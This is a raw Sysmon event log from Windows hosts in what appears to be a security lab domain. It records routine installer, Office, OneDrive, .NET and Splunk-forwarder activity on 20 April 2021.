23542300x800000000000000079452Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:25.404{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DF006A6A1C044E5535.TMPMD5=BF619EAC0CDF3F68D496EA9344137E8B,SHA256=076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560,IMPHASH=00000000000000000000000000000000falsefalse - shredded file with pattern 0x00 23542300x800000000000000079451Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:25.404{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DFC1AE53D0893BF3DB.TMPMD5=754C7F53A80341F1141FB9FE0A3713C3,SHA256=453E2A79A182092804A1EFCAAEFF08C3735C8F5D80E7979A683C396D04F9A153,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000079450Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:25.388{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\MSIBDFB.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000079449Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:25.248{A7A01FEF-EB7F-607E-9C0B-00000000BB01}14005496C:\Windows\system32\msiexec.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\apphelp.dll+20ffd|C:\Windows\system32\apphelp.dll+209c1|C:\Windows\system32\Msi.dll+19dedd|C:\Windows\system32\Msi.dll+2ea6e|C:\Windows\system32\Msi.dll+474c5|C:\Windows\system32\Msi.dll+10a3b5|C:\Windows\system32\Msi.dll+1095d6|C:\Windows\system32\Msi.dll+f3bef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000079448Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:25.201{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\d0829e.msiMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000079447Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:25.154{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\inprogressinstallinfo.ipiMD5=ADDE89C0410A7D4A94FA42390F1B4641,SHA256=94621B0542210F46670CF65E96339FF702FA33645B47DC8C00617B97AEEAFAC0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000079446Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:25.138{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DF86CDBFF71C4D5DF5.TMPMD5=BF619EAC0CDF3F68D496EA9344137E8B,SHA256=076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560,IMPHASH=00000000000000000000000000000000falsefalse - shredded file with pattern 0x00 23542300x800000000000000079445Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:25.138{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DFB5161DE351DA00FB.TMPMD5=ADDE89C0410A7D4A94FA42390F1B4641,SHA256=94621B0542210F46670CF65E96339FF702FA33645B47DC8C00617B97AEEAFAC0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000079444Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:25.138{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC11-607E-3C0E-00000000BB01}1572C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000079443Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:25.138{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC11-607E-3C0E-00000000BB01}1572C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000079442Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:25.138{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DF93AF3CA058C2FC80.TMPMD5=BF619EAC0CDF3F68D496EA9344137E8B,SHA256=076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560,IMPHASH=00000000000000000000000000000000falsefalse - shredded file with pattern 0x00 23542300x800000000000000079441Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:25.138{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DF27F55EE331D0FD11.TMPMD5=ADDE89C0410A7D4A94FA42390F1B4641,SHA256=94621B0542210F46670CF65E96339FF702FA33645B47DC8C00617B97AEEAFAC0,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000079440Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:25.138{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick\Window.2\windowplugin.dll2021-04-20 14:58:25.138 23542300x800000000000000079439Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:25.123{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=AECD880279991A031CA812A651BAB4BF,SHA256=40E42F135CB0C7D900B0DE3C229CF99F250C93F53223E4069B8CF86EC222EDCC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000079438Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:25.123{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\d0829a.msiMD5=7CDFAA6CD31B97CC5A0BC481BA1A60F2,SHA256=CA79EE7BC25052D73CC0044E98DA169375FE9F7E2F9652392CE2FF4D370987CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000079437Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:25.076{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=4662C9AD8A013292B31ED11EC0BAF11A,SHA256=54A84E383BB9CC62C125B434943E98D0F37026C59ACCBEDB7DB3CD98A00232F9,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050533Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:23.709{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52536-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x800000000000000050532Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:23.381{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52535-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x800000000000000050531Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:25.821{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=72C4499DC531A2713D595323656643F3,SHA256=31E86846C7CD5CA8BAB2EEA9D283A645E53173AED1ACA48976D6C13FBFD56AE1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000079519Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:26.794{A7A01FEF-C0A3-607E-6C05-00000000BB01}36244292C:\Windows\system32\csrss.exe{A7A01FEF-EC12-607E-420E-00000000BB01}6316C:\Windows\SysWOW64\msiexec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000079518Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:26.794{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079517Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:26.794{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079516Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:26.794{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079515Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:26.794{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079514Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:26.794{A7A01FEF-EC11-607E-3D0E-00000000BB01}52604668C:\ProgramData\Microsoft\DefaultPackMSI\MainBootStrap.exe{A7A01FEF-EC12-607E-420E-00000000BB01}6316C:\Windows\SysWOW64\msiexec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_32\System\e4e1c2ddf26e804ce437760cd9a5ba23\System.ni.dll+23cc02(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_32\System\e4e1c2ddf26e804ce437760cd9a5ba23\System.ni.dll+1aaaa4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_32\System\e4e1c2ddf26e804ce437760cd9a5ba23\System.ni.dll+1aa39c(wow64)|UNKNOWN(0000000004E8AD64)|UNKNOWN(0000000004E8ABD9)|UNKNOWN(0000000004E8AB04)|UNKNOWN(0000000004E8AA03)|UNKNOWN(0000000004D8D839)|UNKNOWN(0000000000A23B4F)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll+f036(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll+122da(wow64) 154100x800000000000000079513Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:26.803{A7A01FEF-EC12-607E-420E-00000000BB01}6316C:\Windows\SysWOW64\msiexec.exe5.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Windows® installerWindows Installer - UnicodeMicrosoft Corporationmsiexec.exe"msiexec.exe" /i C:\ProgramData\Microsoft\DefaultPackMSI\MicrosoftSearchInBing.msi /qnC:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e72SystemMD5=0BDEAEA7BB4AE7822416CD37EA8EE00D,SHA256=5C188CE4E21FAB002B4D669F91FA19341AB4260F83D798FDAC53229D675DB6BA,IMPHASH=B4730776DFCE61DBCD10D002E3D530E1{A7A01FEF-EC11-607E-3D0E-00000000BB01}5260C:\ProgramData\Microsoft\DefaultPackMSI\MainBootStrap.exe"C:\ProgramData\Microsoft\DefaultPackMSI\MainBootStrap.exe" install 354300x800000000000000079512Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:25.743{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57560-false93.184.220.29-80http 354300x800000000000000079511Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:25.357{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com61540-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 10341000x800000000000000079510Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:26.716{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EC12-607E-410E-00000000BB01}6780C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079509Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:26.685{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC12-607E-410E-00000000BB01}6780C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000079508Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:26.685{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC12-607E-410E-00000000BB01}6780C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079507Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:26.685{A7A01FEF-B624-607E-0B00-00000000BB01}860988C:\Windows\system32\lsass.exe{A7A01FEF-EC11-607E-3D0E-00000000BB01}5260C:\ProgramData\Microsoft\DefaultPackMSI\MainBootStrap.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079506Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:26.685{A7A01FEF-B624-607E-0B00-00000000BB01}860988C:\Windows\system32\lsass.exe{A7A01FEF-EC11-607E-3D0E-00000000BB01}5260C:\ProgramData\Microsoft\DefaultPackMSI\MainBootStrap.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079505Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:26.654{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EC11-607E-3D0E-00000000BB01}5260C:\ProgramData\Microsoft\DefaultPackMSI\MainBootStrap.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079504Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:26.498{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EC12-607E-400E-00000000BB01}6924C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000079503Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:26.466{A7A01FEF-EC11-607E-3D0E-00000000BB01}5260C:\ProgramData\Microsoft\DefaultPackMSI\MainBootStrap.exeC:\Users\Administrator\AppData\Local\Temp\4D7F90B8-F05F-436A-98BD-2DA9BC03BE8A.txt2021-04-20 14:58:26.466 